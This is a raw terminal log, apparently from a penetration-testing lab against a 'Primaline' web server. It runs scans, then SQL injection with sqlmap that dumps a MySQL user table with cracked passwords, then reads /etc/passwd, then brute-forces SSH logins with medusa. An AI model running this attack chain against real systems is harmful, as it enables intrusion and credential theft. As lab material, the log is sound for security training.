root@kali:~# netdiscover
Currently scanning: 192.168.70.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.120 08:00:27:df:b1:1d 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.1 08:00:27:00:e0:df 01 060 CADMUS COMPUTER SYSTEMS
192.168.56.100 08:00:27:15:a3:c4 01 060 CADMUS COMPUTER SYSTEMS
root@kali:~# unicornscan -mT 192.168.1.120
Main [Error route.c:76] no route to host for `192.168.1.120/32'
Main exiting cant get interface(s) for target(s) from route table
root@kali:~# ifconfig eth0 192.168.1.121 netmask 255.255.255.0
root@kali:~# unicornscan -mT 192.168.1.120
TCP open ftp[ 21] from 192.168.1.120 ttl 64
TCP open ssh[ 22] from 192.168.1.120 ttl 64
TCP open http[ 80] from 192.168.1.120 ttl 64
TCP open https[ 443] from 192.168.1.120 ttl 64
TCP open mysql[ 3306] from 192.168.1.120 ttl 64
root@kali:~# nmap -sV -A 192.168.1.120 -pT:21,22,80,443,3306
Starting Nmap 6.40 ( http://nmap.org ) at 2014-01-13 11:23 CET
Nmap scan report for 192.168.1.120
Host is up (0.00038s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_dr-xr-xr-x 2 0 0 40 Jan 2 2011 incoming
22/tcp open ssh OpenSSH 5.1 (protocol 2.0)
| ssh-hostkey: 1024 d5:92:37:32:f2:29:49:a1:3e:4f:cf:53:49:30:de:97 (DSA)
|_2048 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e (RSA)
80/tcp open http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-
20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
443/tcp open ssl/http Apache httpd 2.2.11 ((Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Primaline :: Quality Kitchen Accessories
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T08:10:30+00:00
|_Not valid after: 2010-09-30T08:10:30+00:00
|_ssl-date: 2014-01-13T10:23:39+00:00; -1s from local time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_IDEA_128_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC2_CBC_128_CBC_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 08:00:27:DF:B1:1D (Cadmus Computer Systems)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.13 - 2.6.32
Network Distance: 1 hop
Service Info: OS: Unix
TRACEROUTE
HOP RTT ADDRESS
1 0.38 ms 192.168.1.120
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds
root@kali:~# nc 192.168.1.120 21
220 ProFTPD 1.3.2 Server (Primaline FTP Server) [192.168.1.120]
^C
root@kali:~# ssh root@192.168.1.120
The authenticity of host '192.168.1.120 (192.168.1.120)' can't be established.
RSA key fingerprint is 6f:5a:87:f2:e9:b7:68:85:d7:b9:e5:e1:7f:92:c8:1e.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.120' (RSA) to the list of known hosts.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied, please try again.
root@192.168.1.120's password:
Permission denied (publickey,password,keyboard-interactive).
root@kali:~# nikto -host 192.168.1.120
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.120
+ Target Hostname: 192.168.1.120
+ Target Port: 80
+ Start Time: 2014-01-13 11:27:44 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 22 item(s) reported on remote host
+ End Time: 2014-01-13 11:27:59 (GMT1) (15 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:~# cd /usr/share/dirb
root@kali:/usr/share/dirb# dirb http://192.168.1.120
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Mon Jan 13 11:28:36 2014
URL_BASE: http://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: http://192.168.1.120/ ----
+ http://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)
+ http://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)
+ http://192.168.1.120/index.php (CODE:200|SIZE:1325)
==> DIRECTORY: http://192.168.1.120/phpmyadmin/
==> DIRECTORY: http://192.168.1.120/webalizer/
root@kali:/usr/share/dirb# nikto -host 192.168.1.120 -port 443
- Nikto v2.1.5
---------------------------------------------------------------------------
+ Target IP: 192.168.1.120
+ Target Hostname: 192.168.1.120
+ Target Port: 443
---------------------------------------------------------------------------
+ SSL Info: Subject: /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
Ciphers: DHE-RSA-AES256-SHA
Issuer: /C=DE/ST=Berlin/L=Berlin/O=Apache Friends/CN=localhost
+ Start Time: 2014-01-13 11:32:18 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.2.11 (Unix) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0
+ Retrieved x-powered-by header: PHP/5.2.9
+ The anti-clickjacking X-Frame-Options header is not present.
+ Hostname '192.168.1.120' does not match certificate's CN 'localhost'
+ Server leaks inodes via ETags, header found with file /favicon.ico, inode: 8428, size: 30894, mtime: 0x4303112ee9900
+ mod_apreq2-20051231/2.6.0 appears to be outdated (current is at least 2.6.1)
+ mod_perl/2.0.4 appears to be outdated (current is at least 2.0.7)
+ Apache/2.2.11 appears to be outdated (current is at least Apache/2.2.22). Apache 1.3.42 (final release) and 2.0.64 are also current.
+ mod_ssl/2.2.11 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.2.9 appears to be outdated (current is at least 5.4.4)
+ Perl/v5.10.0 appears to be outdated (current is at least v5.14.2)
+ OpenSSL/0.9.8k appears to be outdated (current is at least 1.0.1c). OpenSSL 0.9.8r is also current.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.11 OpenSSL/0.9.8k PHP/5.2.9 mod_apreq2-20051231/2.6.0 mod_perl/2.0.4 Perl/v5.10.0 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /webalizer/: Directory indexing found.
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /phpmyadmin/changelog.php: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ OSVDB-3233: /cgi-bin/printenv: Apache 2.0 default script is executable and gives server environment variables. All default scripts should be removed. It may also allow XSS types of attacks. http://www.securityfocus.com/bid/4431.
+ OSVDB-3233: /cgi-bin/test-cgi: Apache 2.0 default script is executable and reveals system information. All default scripts should be removed.
+ OSVDB-3268: /icons/: Directory indexing found.
+ Cookie phpMyAdmin created without the httponly flag
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found
+ 6544 items checked: 0 error(s) and 23 item(s) reported on remote host
+ End Time: 2014-01-13 11:34:35 (GMT1) (137 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
root@kali:/usr/share/dirb# dirb https://192.168.1.120
-----------------
DIRB v2.21
By The Dark Raver
-----------------
START_TIME: Mon Jan 13 11:35:44 2014
URL_BASE: https://192.168.1.120/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4592
---- Scanning URL: https://192.168.1.120/ ----
+ https://192.168.1.120/cgi-bin/ (CODE:403|SIZE:1122)
+ https://192.168.1.120/favicon.ico (CODE:200|SIZE:30894)
+ https://192.168.1.120/index.php (CODE:200|SIZE:1325)
==> DIRECTORY: https://192.168.1.120/phpmyadmin/
==> DIRECTORY: https://192.168.1.120/webalizer/
index.php
<p><a href=index.php>Home</a> <a href=add_product.php>Add Product</a> <a href=products.php>View Products</a></p>
add_product.php
<form action="insert_products.php" method="POST">
products.php
<form action="products.php" method="GET">
http://192.168.1.120/insert_products.php
product=prod&description=desc&price=1
--
root@kali:/usr/share/dirb# nc 192.168.1.120 3306
F�j Host '192.168.1.121' is not allowed to connect to this MySQL server
http://192.168.1.120/phpmyadmin/setup/
http://192.168.1.120/phpmyadmin/Documentation.htm
phpMyAdmin 3.1.3.1 Documentation
http://192.168.1.120/products.php?id=1
root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1"
...
[12:03:02] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 37 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8867=8867
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: id=1 UNION ALL SELECT NULL,CONCAT(0x71676e6871,0x4f5255754b6446647646,0x7176646171),NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1 AND SLEEP(5)
---
[12:03:24] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.2.11, PHP 5.2.9
back-end DBMS: MySQL 5.0.11
[12:03:24] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/192.168.1.120'
[*] shutting down at 12:03:24
--dbs
[12:04:45] [INFO] fetching database names
available databases [6]:
[*] cdcol
[*] information_schema
[*] merch
[*] mysql
[*] phpmyadmin
[*] test
Database: cdcol
Table: cds
[3 entries]
+----+------+-----------------------------------+------------------+
| id | jahr | titel | interpret |
+----+------+-----------------------------------+------------------+
| 1 | 1990 | Beauty | Ryuichi Sakamoto |
| 4 | 2001 | Goodbye Country (Hello Nightclub) | Groove Armada |
| 5 | 1997 | Glee | Bran Van 3000 |
+----+------+-----------------------------------+------------------+
Database: mysql
Table: user
[50 entries]
+------------+------------------------------------------------------+
| User | Password |
+------------+------------------------------------------------------+
| aadams | *90837F291B744BBE86DF95A37D2B2524185DBBF5 (whatever) |
| aallen | *22AC3D548EB2C2A2F4E609ADA63251D0AF795AD9 (nintendo) |
| aard | *4DC6D98E4CF6200B9F5529AFDE2E3B909F41E4D0 (kotaku) |
| aharp | *74B1C21ACE0C2D6B0678A5E503D2A60E8F9651A3 (passw0rd) |
| aheflin | *2A032F7C5BA932872F0F045E0CF6B53CF702F2C5 (654321) |
| amaynard | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 (123456) |
| aspears | *A5892368AE83685440A1E27D012306B073BDF5B7 (monkey) |
| aweiland | *E56A114692FE0DE073F9A1DD68A00EEB9703F3F1 (123123) |
| bbanter | *CFBF459D9D6057BC2A85477A38327B96F06B1597 (iloveyou) |
| bphillips | *D6B63C1953E7F096DB307F8AC48C4AD703E57001 (sunshine) |
| bwatkins | *AE9F960F8FA0994C9878D2245DA640EAFF09BA0E (superman) |
| cchisholm | *6A7A490FB9DC8C33C2B025A91737077A7E9CC5E5 (1234567) |
| ccoffee | *2CE4701D02A76C12CD513109CA16967A68B4C23A (princess) |
| dcooper | *3B477BC23EA39BFF66D64BFB68DB5EC5F5E31C91 (consumer) |
| dgilfillan | *6691484EA6B50DDDE1926A220DA01FA9E575C18A (abc123) |
| dgrant | *7FD9F123C9FC025372A5AAD19D107783CD19CCF7 (cheese) |
| djohnson | *FD571203974BA9AFE270FE62151AE967ECA5E0AA (111111) |
| dstevens | *B021918A5DCA54916CF724573179571DFC37AC88 (jennifer) |
| dtraylor | *24B8599BAF46DD4B4D8DB50A3B10136457492622 (starwars) |
| dwestling | *446525BB82B5E22BD9E525261D37C494F623C52B (blahblah) |
| hlovell | *DF216F57F1F2066124E1AA5491D995C3CB57E4C2 (welcome) |
| jalcantar | *44FFB04331ADAECB1FAB104F634E9B066BF8C6DC (pokemon) |
| jalvarez | *B2B366CA5C4697F31D4C55D61F0B17E70E5664EC (666666) |
| jayala | *DB1B792EC6DAE393BAE7AD832D3AF207C12E9A00 (michael) |
| jbresnahan | *FBA7C2D27C9D05F3FD4C469A1BBAF557114E5594 (Password) |
| jdavenport | *61305383748FBEAB119F9A8BC35EBBADB4889A9D (babyl0n) |
| jduff | *46CFC7938B60837F46B610A2D10C248874555C14 (trustno1) |
| jfranklin | *2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19 (password) |
| kclemons | *C5FEAC8A32D4FAFF1EF681447DA706634352AFF8 (killer) |
| krenfro | *D183105443FBDE597607B8BC5475A9E1B7847F3E (gizmodo) |
| ktso | *81101DED975D54BD76A3C8EAD293597AE9BB143F (computer) |
| kwebber | *79BF466BCC601BD91A0897BB162421F9BA8C29CA (lifehack) |
| lmartinez | *ED043A01F4583450BC8EB1E83C00C372CA49C4E4 (michelle) |
| lmorales | *8D6A637F37955DBFCE1229204DDBED1CE11E6F41 (master) |
| mbryan | *626AC8265C7D53693CB7478376CE1B4825DFF286 (pepper) |
| mholland | *51AA306E66303073DBA15D2750E23C90C7A7F947 (baseball) |
| mnader | *94F3DC3F398B76269CAAD51627279D4233A6C89A (soccer) |
| mrodriguez | *A7D31514D37A55CE91C6C5DF97299CBC1B1937EC (jordan) |
| myajima | *00A51F3F48415C7D4E8908980D443C29C69B60C9 (12345) |
| qpowers | *84AAC12F54AB666ECFC2A83C676908C8BBC381B1 (12345678) |
| rdominguez | *3EEB06BE54EABF909DC8F6107110777F1DE43186 (gawker) |
| rjacobson | *797420C584EBF42750EB523104268BA0FD87FBC8 (internet) |
| rpatel | *B12289EEF8752AD620294A64A37CD586223AB454 (0) |
| sgains | *F491287896471CB21030790BF46865C4A39DE651 (batman) |
| sjohnson | *FCAAF3F0BD94C027B2769A95903C355CE6294660 (football) |
| strammel | *F8E113FD51D520075836A4B815568BA2B96F7C30 (dragon) |
| swarren | *7B2F14D9BB629E334CD49A1028BD85750F7D3530 (shadow) |
| tdeleon | *AA1420F182E88B9E5F874F6FBE7459291E8F4601 (qwerty) |
| tgoodchap | *D37C49F9CBEFBF8B6F4B165AC703AA271E079004 (letmein) |
| webapp | *0DCC22A95EEBFF4984DF6A7B7F2D7D28DBB5F36F |
+------------+------------------------------------------------------+
root@kali:~# sqlmap -u "http://192.168.1.120/products.php?id=1" --file-read=/etc/passwd
root@kali:~# cat /usr/share/sqlmap/output/192.168.1.120/files/_etc_passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
qpowers:x:1000:100:Quinton Powers:/home/qpowers:
mbryan:x:1001:100:Michael Bryan:/home/mbryan:
dgrant:x:1002:100:Daniel Grant:/home/dgrant:
dgilfillan:x:1003:100:Darcy Gilfillan:/home/dgilfillan:
jbresnahan:x:1004:100:Jay Bresnahan:/home/jbresnahan:
aadams:x:1005:100:Adam Adams:/home/aadams:
aweiland:x:1006:100:Adam Weiland:/home/aweiland:
cchisholm:x:1007:100:Cindy Chisholm:/home/cchisholm:
jfranklin:x:1008:100:Johnny Franklin:/home/jfranklin:
hlovell:x:1009:100:Henrietta Lovell:/home/hlovell:
bphillips:x:1010:100:Brad Phillips:/home/bphillips:
myajima:x:1011:100:Moto Yajima:/home/myajima:
jalcantar:x:1012:100:Jesse Alcantar:/home/jalcantar:
jayala:x:1013:100:John Ayala:/home/jayala:
aard:x:1014:100:Aaron Ard:/home/aard:
aharp:x:1015:100:Annie Harp:/home/aharp:
lmorales:x:1016:100:Lindsey Morales:/home/lmorales:
kclemons:x:1017:100:Kathryn Clemons:/home/kclemons:
tgoodchap:x:1018:100:Taj Goodchap:/home/tgoodchap:
tdeleon:x:1019:100:Terrence Deleon:/home/tdeleon:
krenfro:x:1020:100:Kimberly Renfro:/home/krenfro:
bbanter:x:1021:100:Bob Banter:/home/bbanter:
aspears:x:1022:100:Adam Spears:/home/aspears:
djohnson:x:1023:100:Daniel Johnson:/home/djohnson:
aheflin:x:1024:100:Anna Heflin:/home/aheflin:
jdavenport:x:1025:100:James Davenport:/home/jdavenport:
sgains:x:1026:100:Susan Gains:/home/sgains:
swarren:x:1027:100:Samuel Warren:/home/swarren:
rdominguez:x:1028:100:Rafael Dominguez:/home/rdominguez:
ktso:x:1029:100:Kristen Tso:/home/ktso:
amaynard:x:1030:100:Arthur Maynard:/home/amaynard:
lmartinez:x:1031:100:Luis Martinez:/home/lmartinez:
dwestling:x:1032:100:David Westling:/home/dwestling:
dtraylor:x:1033:100:Donnie Traylor:/home/dtraylor:
jalvarez:x:1034:100:Joy Alvarez:/home/jalvarez:
mrodriguez:x:1035:100:Manuel Rodriguez:/home/mrodriguez:
rjacobson:x:1036:100:Randy Jacobson:/home/rjacobson:
dcooper:x:1037:100:Donald Cooper:/home/dcooper:
mholland:x:1038:100:Marian Holland:/home/mholland:
aallen:x:1039:100:Aaron Allen:/home/aallen:
ccoffee:x:1040:100:Chad Coffee:/home/ccoffee:
sjohnson:x:1041:100:Steven Johnson:/home/sjohnson:
bwatkins:x:1042:100:Brandon Watkins:/home/bwatkins:
kwebber:x:1043:100:Kathleen Webber:/home/kwebber:
rpatel:x:1044:100:Randall Patel:/home/rpatel:
jduff:x:1045:100:Jerry Duff:/home/jduff:
mnader:x:1046:100:Muhammad Nader:/home/mnader:
strammel:x:1047:100:Stephanie Trammel:/home/strammel:
dstevens:x:1048:100:Donald Stevens:/home/dstevens:
root@kali:~# pico user_pass-txt
:aadams:whatever
:aallen:nintendo
:aard:kotaku
:aharp:passw0rd
:aheflin:654321
:amaynard:123456
:aspears:monkey
:aweiland:123123
:bbanter:iloveyou
:bphillips:sunshine
:bwatkins:superman
:cchisholm:1234567
:ccoffee:princess
:dcooper:consumer
:dgilfillan:abc123
:dgrant:cheese
:djohnson:111111
:dstevens:jennifer
:dtraylor:starwars
:dwestling:blahblah
:hlovell:welcome
:jalcantar:pokemon
:jalvarez:666666
:jayala:michael
:jbresnahan:Password
:jdavenport:babyl0n
:jduff:trustno1
:jfranklin:password
:kclemons:killer
:krenfro:gizmodo
:ktso:computer
:kwebber:lifehack
:lmartinez:michelle
:lmorales:master
:mbryan:pepper
:mholland:baseball
:mnader:soccer
:mrodriguez:jordan
:myajima:12345
:qpowers:12345678
:rdominguez:gawker
:rjacobson:internet
:rpatel:0
:sgains:batman
:sjohnson:football
:strammel:dragon
:swarren:shadow
:tdeleon:qwerty
:tgoodchap:letmein
root@kali:~# medusa -h 192.168.1.120 -C user_pass-txt -M ssh -v 6
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
GENERAL: Parallel Hosts: 1 Parallel Logins: 1
GENERAL: Total Hosts: 1
GENERAL: Total Users: [combo]
GENERAL: Total Passwords: [combo]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aadams (1 of 49, 0 complete) Password: whatever (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aadams Password: whatever [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aallen (2 of 49, 1 complete) Password: nintendo (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aallen Password: nintendo [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aard (3 of 49, 2 complete) Password: kotaku (1 of 1
complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aard Password: kotaku [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aharp (4 of 49, 3 complete) Password: passw0rd (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aharp Password: passw0rd [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aheflin (5 of 49, 4 complete) Password: 654321 (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aheflin Password: 654321 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: amaynard (6 of 49, 5 complete) Password: 123456 (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: amaynard Password: 123456 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aspears (7 of 49, 6 complete) Password: monkey (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aspears Password: monkey [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: aweiland (8 of 49, 7 complete) Password: 123123 (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: aweiland Password: 123123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bbanter (9 of 49, 8 complete) Password: iloveyou (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bbanter Password: iloveyou [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bphillips (10 of 49, 9 complete) Password: sunshine
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bphillips Password: sunshine [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: bwatkins (11 of 49, 10 complete) Password: superman
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: bwatkins Password: superman [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: cchisholm (12 of 49, 11 complete) Password: 1234567
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: cchisholm Password: 1234567 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: ccoffee (13 of 49, 12 complete) Password: princess (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: ccoffee Password: princess [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dcooper (14 of 49, 13 complete) Password: consumer (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dcooper Password: consumer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgilfillan (15 of 49, 14 complete) Password: abc123
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgilfillan Password: abc123 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dgrant (16 of 49, 15 complete) Password: cheese (1 of
1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dgrant Password: cheese [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: djohnson (17 of 49, 16 complete) Password: 111111 (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: djohnson Password: 111111 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dstevens (18 of 49, 17 complete) Password: jennifer
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dstevens Password: jennifer [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dtraylor (19 of 49, 18 complete) Password: starwars
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dtraylor Password: starwars [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: dwestling (20 of 49, 19 complete) Password: blahblah
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: dwestling Password: blahblah [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: hlovell (21 of 49, 20 complete) Password: welcome (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: hlovell Password: welcome [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalcantar (22 of 49, 21 complete) Password: pokemon
(1 of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalcantar Password: pokemon [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jalvarez (23 of 49, 22 complete) Password: 666666 (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jalvarez Password: 666666 [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.120 (1 of 1, 0 complete) User: jayala (24 of 49, 23 complete) Password: michael (1
of 1 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.120 User: jayala Password: michael [SUCCESS]
